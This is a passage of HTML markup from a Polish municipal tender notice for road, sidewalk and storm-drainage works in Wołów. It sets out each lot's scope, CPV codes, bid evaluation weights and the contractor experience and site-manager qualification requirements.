class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach inwestycji przewiduje się dobudowę chodnika o nawierzchni z kostki betonowej Holland gr. 8 cm, o szerokości zmiennej od 1,25 m do 2,0 m. Od strony jezdni chodnik należy ograniczyć krawężnikiem betonowym 15x30 cm wystającym na 12 cm, ułożonym na ławie z betonu C12/15 z oporem o grubości 10 cm. Od strony zieleńca chodnik należy ograniczyć obrzeżem betonowym 8x30 cm ułożonym na ławie z betonu C12/15 o grubości 10 cm. <br/>Zjazdy, podobnie jak chodniki, wykonane będą z kostki betonowej o gr. 8 cm o szerokości 3,5 m, zakończone skosami 1:1 i obramowane z 3 stron obrzeżami betonowymi 8x30 cm. Od strony jezdni zastosowano krawężnik najazdowy betonowy 15x22 cm na ławie z betonu C12/15 z oporem o gr. 10 cm. <br/>Wzdłuż krawężnika zaprojektowano ściek z kostki betonowej 16x16 cm ułożonej na ławie z betonu C12/15 o grubości 12 cm i obniżony względem krawędzi jezdni o 3 cm po stronie wschodniej oraz 2 cm po stronie zachodniej. <br/>Ścieki przykrawężnikowe należy wykonać po wcześniejszym wyrównaniu istniejącej krawędzi jezdni, a po ich wykonaniu, styk jezdni i ścieku należy wypełnić bitumiczną masą zalewową. <br/>Na odcinkach 0+150 – 0+170 i 0+263 – 0+295, gdzie nie ma możliwości usytuowania ścieku poza krawędzią istniejącej jezdni, należy go wykonać w ramach istniejącej szerokości jezdni. <br/>Na odcinku 0+168 – 0+193 wykonano poszerzenie istniejącej nawierzchni bitumicznej.<br/>Konstrukcję chodnika należy wykonać na podłożu gruntowym o grupie nośności G1. W przypadku stwierdzenia występowania w podłożu gruntów innych niż G1 założono podniesienie ich nośności do klasy G1 poprzez zastosowanie dodatkowej warstwy gruntu niewysadzinowego stabilizowanego spoiwem hydraulicznym o grubości 15 cm i Rm=1,5MPa zarówno dla chodników, jak i zjazdów oraz Rm=2,5 MPa dla poszerzenia jezdni.<br/>Odwodnienie jezdni realizowane będzie za pomocą jednostronnego, 2% spadku poprzecznego chodnika (w stronę jezdni) oraz spadkiem podłużnym odprowadzającym wody opadowe do projektowanego wzdłuż jezdni ścieku przykrawężnikowego o szerokości 16 cm z kostki betonowej. Następnie wody kierowane będą za pomocą ścieków przykrawężnikowych do projektowanych wpustów, które będą podłączone do istniejącej kanalizacji deszczowej. <br/>W miejscu wylotu istniejącej kanalizacji do rowu wyregulowano istniejącą skarpę oraz zastosowano umocnienie dna rowu i skarpy za pomocą kostki brukowej betonowej zatopionej w betonie.<br/>Na odcinku objętym opracowaniem zinwentaryzowano 2 przepusty znajdujące się na cieku Struga Mojęcicka, przepust o konstrukcji żelbetowej, skrzynkowej oraz przepust składający się z 2 rur o średnicy 500 mm. Ścianki czołowe od strony wschodniej mają konstrukcję żelbetową, od strony zachodniej ceglaną. <br/>Ze względu na fakt, iż ściana czołowa ceglana jest w bardzo złym stanie technicznym, przewidziano jej remont. Należy ją oczyścić, a następnie uzupełnić zaprawą spoiny, w których są ubytki. Zniszczoną górną warstwę cegieł należy skuć, odmurować i uzupełnić 6 warstw na długości ściany czołowej. <br/>Ścianki żelbetowe należy oczyścić z wykwitów przy pomocy preparatów do tego przeznaczonych, skuć luźne i skorodowane warstwy betonu, a zdrową powierzchnię oczyścić. Następnie powierzchnię „starego” betonu należy obficie zwilżyć wodą i po wstępnym przyschnięciu nałożyć warstwę kontaktową z zaprawy mineralnej. Ubytki należy wypełnić zaprawą na bazie cementu oraz PCC. Na koniec całą powierzchnię betonową zabezpieczyć powłoką antykarbonatyzacyjną barwioną na kolor szary (RAL 7045). <br/>Bariery w obrębie przepustów należy dokładnie oczyścić przy pomocy piaskowania do powierzchni nieskorodowanej. Następnie pomalować podkładową farbą antykorozyjną opartą na modyfikowanych alkidach oraz farbą nawierzchniową opartą na mieszance żywic alkidowych i uretanowych, zachowując biało (RAL 9010) – niebieską (RAL5010) kolorystykę stanu istniejącego.<br/>W projekcie nie przewiduje się wycinki drzew ani krzewów. Należy dokonać cięć pielęgnacyjnych gałęzi drzew i krzewów kolidujących ze skrajnią drogową, znajdujących się w pobliżu istniejących przepustów.<br/>Projektuje się remont jednego istniejącego wpustu (Wp6) poprzez wymianę na nowy wraz z przykanalikiem oraz budowę pięciu nowych wpustów (Wp1-Wp5) wraz z przykanalikami podłączonymi do istniejącej kanalizacji deszczowej, zlokalizowanej w poboczu drogi gminnej.<br/>Projektuje się remont fragmentu istniejącej kanalizacji deszczowej od studni (D1) do wylotu (W1) poprzez wymianę studni na nową oraz wymianie rury na nową o tej samej średnicy. <br/>Projektowany remont kanalizacji deszczowej obejmuje rury DN 200 PVC-U SN-8 łączone kielichowo oraz studnie betonową DN1000 (D1) zgodnie z projektem zagospodarowania terenu wraz z remontem wylotu W1. Na studni należy zastosować właz kanałowy żelbetowy, samoblokujący bez części ruchomych, o średnicy DN600 klasy D400. Studnia betonowa powinna spełniać wymogi normy PN-EN 1917. <br/>Wody opadowe będą odprowadzane z jezdni za pomocą projektowanych 6 wpustów ulicznych oraz przykanalików do istniejącej kanalizacji deszczowej za pomocą istniejących studni rewizyjnych. Jedynie wpust nr Wp2 będzie podłączony na trójnik bezpośrednio do istniejącego kanału deszczowego w rejonie przystanku autobusowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zgodnie z swz</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach inwestycji planuje się wykonać przebudowę istniejących dróg osiedla zlokalizowanego pomiędzy ulicami S. Żeromskiego oraz M. Curie – Skłodowskiej w Wołowie. Łączna długość objętych opracowaniem dróg wynosi około 2030m, w tym: <br/>1) przebudowywany odcinek ul. Zbigniewa Herberta – długości około 250m; <br/>2) przebudowywany odcinek ul. Jacka Kaczmarskiego – długości około 510m; <br/>3) przebudowywany odcinek ul. ks. Jana Twardowskiego – długości około 100m; <br/>4) przebudowywany odcinek ul. Jacka Kaczmarskiego (boczna) – długości około 50m; <br/>5) przebudowywany odcinek ul. ks. Józefa Tischnera – długości około 140m; <br/>6) przebudowywany odcinek ul. Stanisława Lema – długości około 100m; <br/>7) przebudowywany odcinek ul. G. Herlinga - Grudzińskiego – długości około 480m; <br/>8) przebudowywany odcinek ul. Marka Hłaski – długości około 70m; <br/>9) przebudowywany odcinek ul. Józefa Czapskiego – długości około 170m; <br/>10) przebudowywany odcinek ul. Czesława Miłosza – długości około 160m; <br/><br/>Ulice Jacka Kaczmarskiego oraz G. Herlinga – Grudzińskiego zaprojektowano jako drogi o parametrach klasy L – lokalne. Pozostałe ulice objęte opracowaniem zaprojektowano jako drogi klasy D – dojazdowe. Do obsługi ruchu pieszego zaprojektowano chodniki oraz dojścia piesze do posesji. Do obsługi przyległych posesji i działek zaprojektowano zjazdy indywidualne, zachowując ich lokalizację. Nie planuje się wprowadzać zmian do istniejącego sposobu zagospodarowania terenów przyległych do inwestycji. Nie likwiduje się żadnego z istniejących zjazdów. <br/>W obszarze opracowania zaprojektowano 98 nowych miejsc postojowych dla pojazdów osobowych o wymiarach 2,5x6,0m oraz 5 miejsc dla pojazdów osób niepełnosprawnych o wymiarach 3,6x6,0m. Łączna powierzchnia projektowanych miejsc postojowych wynosi około 1750m2. <br/>Planuje się wykonanie nawierzchni projektowanych jezdni, chodników, placów do selektywnej zbiórki odpadów, zjazdów oraz miejsc postojowych z kostki betonowej. <br/>Do odprowadzenia wód opadowych i roztopowych z obszaru inwestycji projektuje się budowę nowego odcinka kanalizacji deszczowej, składającego się ze studni rewizyjnych, wpustów ulicznych wraz przykanalikami, odwodnień liniowych oraz kanałów deszczowych. W ramach inwestycji zaprojektowano również przebudowę kolidującej sieci elektroenergetycznej – oświetlenia ulicznego. <br/>Planuje się wykonanie zieleńców, obsianych mieszanką traw. Konieczna jest wycinka części drzew i krzewów kolidujących z planowaną inwestycją. W ramach inwestycji zaprojektowano wykonanie nasadzeń kompensacyjnych - zieleni ozdobnej na terenach należącym do inwestora. <br/>Wody opadowe i roztopowe odprowadzone zostaną za pomocą spadków poprzecznych i podłużnych do odbiorników w postaci istniejących i projektowanych wpustów deszczowych. Na potrzeby realizowanej inwestycji zakłada się wykonanie nowego odcinka sieci kanalizacji deszczowej. Kanalizacja deszczowa zostanie wykonana jako kanalizacja deszczowa grawitacyjna. Średnice sieci kanalizacyjnej w zakresie fi110 – fi300, spadki podłużne kanału deszczowego zgodne z wymaganiami prawnymi i normowymi.<br/>Zakres opracowania obejmuje przebudowę istniejącej, kolidującej sieci elektroenergetycznej – oświetlenia ulicznego.<br/>Należy zwrócić szczególną uwagę przy wykonywaniu robót na istniejący drzewostan. Zachować szczególną ostrożność przy wykonywaniu robót przy korzeniach istniejących drzew i krzewów i dokonać ich zabezpieczenia. Wyznacznikiem zasięgu obszaru prac ręcznych jest zazwyczaj obrys korony drzewa.<br/>W ramach kontraktu przewiduje się wprowadzenie zmiany stałej organizacji ruchu. Przed wszczęciem postępowania w sprawie wydania decyzji o pozwoleniu na budowę dla Inwestycji sporządzono projekt organizacji ruchu, który stanowi odrębne opracowanie, zgodnie z §2 pkt. 1a Rozporządzenia Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz.U. 2017 poz. 784 z późn. zmianami).<br/><br/>Szczegółowe informacje o projektowanych rozwiązaniach technicznych zawarto w dokumentacji projektowej, która stanowi załączniki do SWZ.<br/><br/>Uwaga:<br/>Zakres niniejszego postępowania obejmuje odcinek 2c wg dokumentacji kosztorysowej tzn. poniższe ulice:<br/>- przebudowywany odcinek fragment ul. Jacka Kaczmarskiego – długości około 200m; <br/>- przebudowywany odcinek ul. Stanisława Lema – długości około 100m; <br/>- przebudowywany odcinek ul. ks. Józefa Tischnera – długości około 140m; <br/>- przebudowywany odcinek ciągu pieszego nr 2 – długości około 160m. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233200-1 - Roboty w zakresie różnych nawierzchni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zgodnie z swz</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach zadania przewiduje się zaprojektowanie i uzyskanie w imieniu Zamawiającego dokumentu uprawniającego do rozpoczęcia robót budowlanych oraz wykonanie robót budowlanych w oparciu o dokumentację techniczną uzgodnioną z Zamawiającym dla zadania pn.: „Remont ul. Inwalidów Wojennych w Wołowie”. <br/>Przedmiotem opracowania projektowego i robót budowlanych jest wymiana nawierzchni drogowych (jezdnia i chodniki) w ulicy Kupieckiej w Wołowie oraz budowa brakującego odcinka ul. Batalionów Chłopskich wraz z chodnikiem i skrzyżowaniem z ul. Kupiecką. Przewidywany zakres opracowania obejmuje geodezyjne działki:<br/>Ul. Kupiecka - działka nr 80/1, 82/2 i 90 AM-43 obręb Wołów-Miasto, gm. Wołów <br/>Ul. Batalionów Chłopskich - działka nr 87, 89 AM-43 oraz 38 AM-48 obręb Wołów-Miasto, gm. Wołów <br/>Celem całego opracowania jest poprawa warunków ruchu i bezpieczeństwa ulicy Kupieckiej, połączenie jej z ul. Batalionów Chłopskich poprzez wykonanie skrzyżowania i dobudowa brakującego odcinka ul. Batalionów Chłopskich oraz poprawienie nośności konstrukcji drogi ul. Kupieckiej.<br/>Przewiduje się wymianę konstrukcji nawierzchni drogowych w ulicy Kupieckiej w Wołowie wraz chodnikiem. Długość projektowanego odcinka w ul. Kupieckiej wynosi łącznie około 250,00 m (od skrzyżowania z ul. Armii Krajowej do skrzyżowania z ul. Ułanów Krechowieckich oraz łącznik w kierunku boiska Orlik przy SP nr 1). W zakresie ul. Batalionów Chłopskich, odcinek około 35 m, należy zaprojektować i dobudować brakujący fragment ulicy oraz chodnika wraz ze skrzyżowaniem z ul. Kupiecką. Szerokość jezdni i chodnika oraz układ w ul. Batalionów Chłopskich należy dostosować do istniejącego na tej ulicy odcinka.<br/>Zakładane parametry drogowe:<br/>•	kategoria obciążenia ruchem– KR 2 dla jezdni drogi klasy D,<br/>•	prędkość projektowa – 30 km/h,<br/>•	przekrój poprzeczny – daszkowy dla ul. Kupieckiej, do osi dla ul. batalionów Chłopskich, <br/>•	szerokość jezdni – zmienna około od 4,00m do 5,00m, <br/>•	szerokość chodnika pozostaje bez zmian w stosunku do szerokości istniejącej,<br/>•	pochylenie chodnika w stronę jezdni i=1-3%.<br/><br/>Wszelkie projektowane parametry drogowe muszą być zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 24 czerwca 2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych (Dz.U. 2022 poz. 1518).<br/>Niweletę drogi stanowi wysokościowe odtworzenie istniejącej sytuacji wysokościowej z dostosowaniem obecnego przebiegu w planie do istniejących zjazdów i skrzyżowań. Z uwagi na powyższe przed rozpoczęciem projektowania należy zinwentaryzować spadki podłużne i poprzeczne oraz sytuację wysokościową również na zjazdach i dojściach w celu odtworzenia sytuacji wysokościowej istniejących spadków w taki sposób, aby zapewnić skuteczne odwodnienia drogi za pośrednictwem wpustów deszczowych w istniejącej lokalizacji. Wszystkie wpusty deszczowe wraz z przykanalikami kwalifikują się do wymiany ze względu na zły stan techniczny. <br/>Zakres opracowania dokumentacji i robót budowlanych w br. sanitarnej (kanalizacja deszczowa) obejmuje:<br/>•	wymianę wszystkich istniejących wpustów kanalizacji deszczowej na nowe,<br/>•	wymianę istniejących przykanalików na nowe,<br/>•	renowację istniejących studni zlokalizowanych w jezdni lub w przypadku braku możliwości, wymianę na nowe.<br/><br/>Szczegółowy zakres poszczególnych części zadania znajduje się w PFU, dokumentacji projektowej oraz SWZ, które stanowią załączniki do materiałów przetargowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">zgodnie z swz</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4)	zdolności technicznej lub zawodowej:<br/>Wymagane jest spełnienie minimalnych warunków dotyczących wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego wykonawcy lub osób skierowanych przez wykonawcę do realizacji zamówienia, umożliwiające realizację zamówienia na odpowiednim poziomie jakości, w poniżej przedstawionym zakresie:<br/><br/><br/><br/><br/>a) Wiedza i doświadczenie:<br/>Dla części nr 1<br/>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie w okresie 5 ostatnich lat przed upływem terminu składania ofert (a jeżeli okres działalności jest krótszy – to w tym okresie) minimum:<br/>•	dwóch zadań inwestycyjnych lub remontowych – budowy, przebudowy lub remontu dróg/ulic o jezdni z nawierzchnią bitumiczną, wraz z infrastrukturą towarzyszącą, o wartości umownej min. 700.000,00 zł brutto każda.<br/><br/>Dla części nr 2<br/>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie w okresie 5 ostatnich lat przed upływem terminu składania ofert (a jeżeli okres działalności jest krótszy – to w tym okresie) minimum:<br/>•	dwóch zadań inwestycyjnych lub remontowych – budowy, przebudowy lub remontu dróg/ulic o jezdni z nawierzchnią bitumiczną, wraz z infrastrukturą towarzyszącą, o wartości umownej min. 1.000.000,00 zł brutto każda.<br/><br/>Dla części nr 3<br/>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie w okresie 5 ostatnich lat przed upływem terminu składania ofert (a jeżeli okres działalności jest krótszy – to w tym okresie) minimum:<br/>•	dwóch zadań inwestycyjnych lub remontowych – budowy, przebudowy lub remontu dróg/ulic w tym również samych chodników o nawierzchni z kostki betonowej, wraz z infrastrukturą towarzyszącą, o wartości umownej min. 350.000,00 zł brutto każda.<br/><br/>Dla części nr 4<br/>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie w okresie 5 ostatnich lat przed upływem terminu składania ofert (a jeżeli okres działalności jest krótszy – to w tym okresie) minimum:<br/>•	dwóch zadań inwestycyjnych lub remontowych – budowy, przebudowy lub remontu dróg/ulic o nawierzchni z kostki betonowej, wraz z infrastrukturą towarzyszącą, o wartości umownej min. 1.500.000,00 zł brutto każda.<br/><br/>Dla części nr 5<br/>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie w okresie 5 ostatnich lat przed upływem terminu składania ofert (a jeżeli okres działalności jest krótszy – to w tym okresie) minimum:<br/>•	dwóch zadań inwestycyjnych lub remontowych – budowy, przebudowy lub remontu dróg/ulic o jezdni z nawierzchnią z kostki betonowej, wraz z infrastrukturą towarzyszącą, o wartości umownej min. 500.000,00 zł brutto każda.<br/><br/><br/><br/><br/>b) Kwalifikacje zawodowe i doświadczenie osób skierowanych do realizacji zamówienia, odpowiednie do funkcji jaka zostanie im powierzona:<br/><br/>Dla części nr 1<br/>Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie następującymi osobami, które będą uczestniczyły w wykonywaniu zamówienia, legitymującymi się odpowiednimi kwalifikacjami zawodowymi, wykształceniem i doświadczeniem, niezbędnym do wykonania zamówienia:<br/>•	Funkcja: Kierownik Budowy – co najmniej 1 osoba, która:<br/>	posiada uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane do kierowania robotami budowlanymi, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>	pełniła funkcję kierownika budowy przy co najmniej dwóch zadaniach inwestycyjnych lub remontowych – budowy, przebudowy lub remontu dróg/ulic o jezdni z nawierzchnią bitumiczną, wraz z infrastrukturą towarzyszącą, o wartości umownej min. 700.000,00 zł brutto każda.<br/><br/>Dla części nr 2<br/>Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie:<br/>•	Funkcja: Kierownik Budowy – co najmniej 1 osoba, która:<br/>	posiada uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadającymi im uprawnieniami budowlanymi wydanymi na podstawie wcześniej obowiązujących przepisów, <br/>	pełniła funkcję kierownika budowy przy co najmniej dwóch zadaniach inwestycyjnych lub remontowych – budowy, przebudowy lub remontu dróg/ulic o jezdni z nawierzchnią bitumiczną, wraz z infrastrukturą towarzyszącą, o wartości umownej min. 1.000.000,00 zł brutto każda.<br/><br/>Dla części nr 3<br/>Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie:<br/>•	Funkcja: Kierownik Budowy – co najmniej 1 osoba, która:<br/>	posiada uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadającymi im uprawnieniami budowlanymi wydanymi na podstawie wcześniej obowiązujących przepisów, <br/>	pełniła funkcję kierownika budowy przy co najmniej dwóch zadaniach inwestycyjnych lub remontowych – budowy, przebudowy lub remontu dróg/ulic o jezdni z nawierzchnią kostki betonowej, wraz z infrastrukturą towarzyszącą, o wartości umownej min. 350.000,00 zł brutto każda.<br/><br/>Dla części nr 4<br/>Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie:<br/>•	Funkcja: Kierownik Budowy – co najmniej 1 osoba, która:<br/>	posiada uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadającymi im uprawnieniami budowlanymi wydanymi na podstawie wcześniej obowiązujących przepisów, <br/>	pełniła funkcję kierownika budowy przy co najmniej dwóch zadaniach inwestycyjnych lub remontowych – budowy, przebudowy lub remontu dróg/ulic o jezdni z nawierzchnią z kostki betonowej, wraz z infrastrukturą towarzyszącą, o wartości umownej min. 1.500.000,00 zł brutto każda.<br/><br/>Dla części nr 5<br/>Za spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna dysponowanie:<br/>•	Funkcja: Kierownik Budowy – co najmniej 1 osoba, która:<br/>	posiada uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadającymi im uprawnieniami 